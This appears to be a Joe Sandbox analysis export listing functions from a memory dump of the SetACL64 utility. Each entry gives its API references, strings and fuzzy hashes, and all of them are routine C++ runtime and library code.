Function 00007FF686838830 Relevance: 9.1, APIs: 6, Instructions: 80COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF686838846
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF68683886B
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF686838895

Part of subcall function 00007FF6868386B0: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF686838719
Part of subcall function 00007FF6868386B0: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF686838764
Part of subcall function 00007FF6868386B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6868387F4

std::_Facet_Register.LIBCPMT ref: 00007FF686838904
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF68683891E
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF686838933

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Locinfo::_Locinfo_ctorRegister
String ID:
API String ID: 3702003507-0
Opcode ID: 5295a9cf4f159f187b6dae6dfa2a8d35e0ab65163286308850760d8e3341d609
Instruction ID: 33b01e2f854d43ca47ac46108accfcf7d7aae661711a8b56741e44fa92e6f5de
Opcode Fuzzy Hash: 5295a9cf4f159f187b6dae6dfa2a8d35e0ab65163286308850760d8e3341d609
Instruction Fuzzy Hash: D8317EE1A4DA42C1EB15DB55E6400B96360FF85B94F18013ADB8D8B795DE6EEC41C320

Function 00007FF68683B340 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 212COMMON

Download Yara Rule

APIs

__std_exception_destroy.LIBVCRUNTIME ref: 00007FF68683B638
__std_exception_destroy.LIBVCRUNTIME ref: 00007FF68683B675

Part of subcall function 00007FF686862864: EnterCriticalSection.KERNEL32(?,?,00000000,00007FF68683ABCE,?,?,00000000,00007FF6868210A5), ref: 00007FF686862874

Strings

D:\Code\uberAgent\Libraries\boost\boost\exception\detail\exception_ptr.hpp, xrefs: 00007FF68683B42F
class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 00007FF68683B424
bad exception, xrefs: 00007FF68683B390

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: __std_exception_destroy$CriticalEnterSection
String ID: D:\Code\uberAgent\Libraries\boost\boost\exception\detail\exception_ptr.hpp$bad exception$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
API String ID: 2585855615-497953542
Opcode ID: 5cb6a45f1239e3b2c4532f3151a5061be94b55bfe2cba1f0f6b6aad54e40ba79
Instruction ID: 106f5ca53cb5d389c8e7022223fdb8b5d3cc6107151ed67dd2551436cee5bf1e
Opcode Fuzzy Hash: 5cb6a45f1239e3b2c4532f3151a5061be94b55bfe2cba1f0f6b6aad54e40ba79
Instruction Fuzzy Hash: F0B145B2B04B45CAEB10CF65E8401AC73B5FB98B48F04813ACA4D93B68EF39E955C754

Function 00007FF68683AFC0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 212COMMON

Download Yara Rule

APIs

__std_exception_destroy.LIBVCRUNTIME ref: 00007FF68683B2B8
__std_exception_destroy.LIBVCRUNTIME ref: 00007FF68683B2F5

Part of subcall function 00007FF686862864: EnterCriticalSection.KERNEL32(?,?,00000000,00007FF68683ABCE,?,?,00000000,00007FF6868210A5), ref: 00007FF686862874

Strings

D:\Code\uberAgent\Libraries\boost\boost\exception\detail\exception_ptr.hpp, xrefs: 00007FF68683B0AF
class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 00007FF68683B0A4
bad allocation, xrefs: 00007FF68683B010

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: __std_exception_destroy$CriticalEnterSection
String ID: D:\Code\uberAgent\Libraries\boost\boost\exception\detail\exception_ptr.hpp$bad allocation$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
API String ID: 2585855615-1037022726
Opcode ID: 5e9cbe34132cbb56183852d500463e094e47345ad778f8edf29a13b90190a2c1
Instruction ID: 9459f664edd9e7e572a739e1d3a99a23d5b667f2a596acc72d7804a2ed40a580
Opcode Fuzzy Hash: 5e9cbe34132cbb56183852d500463e094e47345ad778f8edf29a13b90190a2c1
Instruction Fuzzy Hash: 3EB146B2B04B41DAEB10CF64E9401AC73B5FF98B48B04813ACA4D97B68EF39E955C754

Function 00007FF6868211A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00007FF6868211A6
GetLastError.KERNEL32 ref: 00007FF6868211B8
TlsAlloc.KERNEL32 ref: 00007FF686821206
GetLastError.KERNEL32 ref: 00007FF686821218

Strings

tss, xrefs: 00007FF6868211EE, 00007FF68682124E

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: AllocErrorLast
String ID: tss
API String ID: 4252645092-1638339373
Opcode ID: 29b1765d9a66d25320b0dddf9ab890fdc794b5e67b2e205c5b857635990049a4
Instruction ID: 88d3613bc7585c8887de98f58459499314888efab54541b1c3beafe4da70cd51
Opcode Fuzzy Hash: 29b1765d9a66d25320b0dddf9ab890fdc794b5e67b2e205c5b857635990049a4
Instruction Fuzzy Hash: 13215BB5E0DA46C2E6209B24E88507963A0FF99358F600139DBADC26F5DF7EED45C720

Function 00007FF6868730FC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF686873118
GetProcAddress.KERNEL32 ref: 00007FF68687312E
FreeLibrary.KERNEL32 ref: 00007FF68687314B

Strings

CorExitProcess, xrefs: 00007FF686873127
mscoree.dll, xrefs: 00007FF68687310F

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 731fd435a3bb48197be4118f7954fb208c5f98b7c3500d785dc345691a66c0b5
Instruction ID: 9be6967095f6ccc3f5d6c80fb5b69760ed24e358599062c8a55ddebee3e71035
Opcode Fuzzy Hash: 731fd435a3bb48197be4118f7954fb208c5f98b7c3500d785dc345691a66c0b5
Instruction Fuzzy Hash: DAF0DAA1B19A46C6EF549B60E8843792361BF88B55F44103DE94F85665CF2DD888D730

Function 00007FF6868653F0 Relevance: 7.8, APIs: 5, Instructions: 290COMMONLIBRARYCODE

Download Yara Rule

APIs

__AdjustPointer.LIBCMT ref: 00007FF686865513
__AdjustPointer.LIBCMT ref: 00007FF68686555E

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 9cd00bc65b5929a6a166b842d15e1553bccd8dfd8d4598a16b21d71fb64958ac
Instruction ID: e29ff80d028ba8115f939a6473bc579a7a2e8f38b993d5e34dfd4b08ff187404
Opcode Fuzzy Hash: 9cd00bc65b5929a6a166b842d15e1553bccd8dfd8d4598a16b21d71fb64958ac
Instruction Fuzzy Hash: 14B1E4A2A2A642C2EA66DF11944C63963A1FF44B84F19843DDF4D87785DF3EEC51C322

Function 00007FF68687E93C Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF68687E97D
GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00007FF68687E8FB,?,?,?,00007FF686878743), ref: 00007FF68687EA3C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00007FF68687E8FB,?,?,?,00007FF686878743), ref: 00007FF68687EABC

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 32ec8d574ba77bf2bf9ab58ae09257ebb3ad25bdbe092dfc2be3e9920a5a0306
Instruction ID: 070281e2bc5e73d69ba095eb7674528a56c955b420c02f18b763ee5959756547
Opcode Fuzzy Hash: 32ec8d574ba77bf2bf9ab58ae09257ebb3ad25bdbe092dfc2be3e9920a5a0306
Instruction Fuzzy Hash: 1B81C2A2F18612CAF7509B65A4882BC67B0FF54788F444139DE4EA77A5DE3EAC41C330

Function 00007FF68685CB62 Relevance: 7.7, APIs: 5, Instructions: 181COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF686875174: _invalid_parameter_noinfo.LIBCMT ref: 00007FF68687519A

NetDfsGetClientInfo.NETAPI32 ref: 00007FF68685CCBD
NetApiBufferFree.NETAPI32 ref: 00007FF68685CD21
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685CDE0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685CDE6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685CDEC

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$BufferClientFreeInfo_invalid_parameter_noinfo
String ID:
API String ID: 1720291354-0
Opcode ID: 75da794e4bc783c4a2d79550abe500da8be22825966d2fcdd0e41012ba63a114
Instruction ID: 14f7d1c9ee82a5bdd112fe658efd44f8fe379a48a3946307a06fab59a8a92f03
Opcode Fuzzy Hash: 75da794e4bc783c4a2d79550abe500da8be22825966d2fcdd0e41012ba63a114
Instruction Fuzzy Hash: 6661C1E2A18B82C1EA049B19D44836D2761FF85BD4F40413DDB5E876E9DF7ED881C710

Function 00007FF68687A08C Relevance: 7.7, APIs: 5, Instructions: 158COMMON

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF68687A0C8
_set_statfp.LIBCMT ref: 00007FF68687A0E6
_set_statfp.LIBCMT ref: 00007FF68687A10F
_set_statfp.LIBCMT ref: 00007FF68687A2C8

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bd59eed8a6f0dd15b1754f9599e9c4058d21ae63c9d51c95e5ebd76b830cc49a
Instruction ID: a2af19f878ba62e5a53d3181feb90dd627a63924d593291fcd5949f056915833
Opcode Fuzzy Hash: bd59eed8a6f0dd15b1754f9599e9c4058d21ae63c9d51c95e5ebd76b830cc49a
Instruction Fuzzy Hash: 4F51E7A2F1CD46C6F2229B39A8503766270BF94354F04823DE95EA75E4DF3EAC81D720

Function 00007FF686880C1C Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF686880C44
_set_statfp.LIBCMT ref: 00007FF686880C5F
_set_statfp.LIBCMT ref: 00007FF686880C7B
_set_statfp.LIBCMT ref: 00007FF686880CB7

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: a0e95ead0251a3d4b91f5b95471b4db42acbeaa8104238e2645d395e8be0b7d9
Instruction ID: 31c0b87ca66f8be3ce1b250dae06e0eabe2ece6216759dbccf6a2873f3c02db9
Opcode Fuzzy Hash: a0e95ead0251a3d4b91f5b95471b4db42acbeaa8104238e2645d395e8be0b7d9
Instruction Fuzzy Hash: 8F11B2E2E9CA0385F6641928D9413751143FFA4360E05463CE5BE8A2E7CE2EAC80C234

Function 00007FF686865FE8 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 317COMMONLIBRARYCODE

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF686866186

Strings

csm, xrefs: 00007FF68686612F
csm, xrefs: 00007FF6868660CD
csm, xrefs: 00007FF6868661AD

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: Is_bad_exception_allowed
String ID: csm$csm$csm
API String ID: 2758241748-393685449
Opcode ID: a2d6ed14fbf6e40508f258423ea3b56d009d783b16296921d7f948e16fc77ced
Instruction ID: 31d19d7a33124d0af5e7d560f1747d387a2e960a6c9c2bd73da9c61fcbd081ed
Opcode Fuzzy Hash: a2d6ed14fbf6e40508f258423ea3b56d009d783b16296921d7f948e16fc77ced
Instruction Fuzzy Hash: 3EE1B0B2A18682CAE7219F24D4987AD77A0FF44748F100139DF8D97796CF39E885C752

Function 00007FF68685DC00 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 241COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68685DF79
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685DF85

Strings

gfffffff, xrefs: 00007FF68685DEFC
gfffffff, xrefs: 00007FF68685DC23

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: gfffffff$gfffffff
API String ID: 73155330-161084747
Opcode ID: 65c4fbde1530cd6c047e0c087b113539f9e2fee0312e09cc542a9da4f50b182a
Instruction ID: c37258a4db801f9480e76afe4d4a1d27fa512c17a07f6dd5a7e26f3afc645736
Opcode Fuzzy Hash: 65c4fbde1530cd6c047e0c087b113539f9e2fee0312e09cc542a9da4f50b182a
Instruction Fuzzy Hash: 12A1CCA2A08B89C2DA10CF16E4482A973A4FB98BC4F50823ADF8D87745DF79E595C701

Function 00007FF686883804 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 218COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF686883AE0

Part of subcall function 00007FF68687DA74: _invalid_parameter_noinfo.LIBCMT ref: 00007FF68687DA91

Strings

UTF-8, xrefs: 00007FF686883A5F
ccs, xrefs: 00007FF686883A1B
UTF-16LEUNICODE, xrefs: 00007FF686883A7E

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 1bb88c3171e5cf5bbab3d2ebdd36e20614571ae61b64ac2c66acfc21f2ce36b7
Instruction ID: 8479071785c1584bc1d57f0a077ad4f29f449b10880987e4c186d243a6ac13f6
Opcode Fuzzy Hash: 1bb88c3171e5cf5bbab3d2ebdd36e20614571ae61b64ac2c66acfc21f2ce36b7
Instruction Fuzzy Hash: B08192F2E8C642C6FA654EA9855027826A0FF1AB44F55803DDA4DE72A5CF2FEC01D721

Function 00007FF6868666FC Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 191COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF68686676C
_CallSETranslator.LIBVCRUNTIME ref: 00007FF6868667B7

Strings

RCC, xrefs: 00007FF686866788
MOC, xrefs: 00007FF686866780

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 42ee9dd8031fa90d2704141954d4b245ff7b62f28e672c949d78bded72fb3b52
Instruction ID: 8d331ceec3b825c1ed5deca779b2bbaaac8cb1fada0ceb6d5405841f2c0971e9
Opcode Fuzzy Hash: 42ee9dd8031fa90d2704141954d4b245ff7b62f28e672c949d78bded72fb3b52
Instruction Fuzzy Hash: A591ADB3A18B81CAE710CB65E8847AC7BA0FB05788F10412AEF8D97755DF39D595C700

Function 00007FF68686B4C4 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 154COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF68686B4FE
_invalid_parameter_noinfo.LIBCMT ref: 00007FF68686B6D3

Strings

*, xrefs: 00007FF68686B5FC
, xrefs: 00007FF68686B651

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: $*
API String ID: 3215553584-3982473090
Opcode ID: c990fed08c054b4bafabfd0712f02d3fa7d918f2f89bfa53ed27954d69bca4da
Instruction ID: 07003363c98afa0f5a589a945f7a0319a60298f5640c7d826690c159cf9b1877
Opcode Fuzzy Hash: c990fed08c054b4bafabfd0712f02d3fa7d918f2f89bfa53ed27954d69bca4da
Instruction Fuzzy Hash: 616130F2969252CEE7698E28805C17C3BA2FF05B4CF54113ED74E82295CF2ADC61CB60

Function 00007FF686866C70 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF686866C98
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF686866D80

Strings

csm, xrefs: 00007FF686866DD2
csm, xrefs: 00007FF686866CBA

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eecb3a479b2a8091ed75647188cb13960218c4eb8784a86b31c02a998fb32c90
Instruction ID: 3f51d0ef79901f3ced487147d7f9dcadfffa704688f7f084cc6b19e66824b8cf
Opcode Fuzzy Hash: eecb3a479b2a8091ed75647188cb13960218c4eb8784a86b31c02a998fb32c90
Instruction Fuzzy Hash: 5151A1B29286C2C6EB648B51D44876977A0FF44B84F24413DDB9E87B95CF3EE890C712

Function 00007FF68687926C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 134COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6868792AF

Strings

gfff, xrefs: 00007FF6868793D1
-, xrefs: 00007FF6868793A6
e+000, xrefs: 00007FF686879354

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
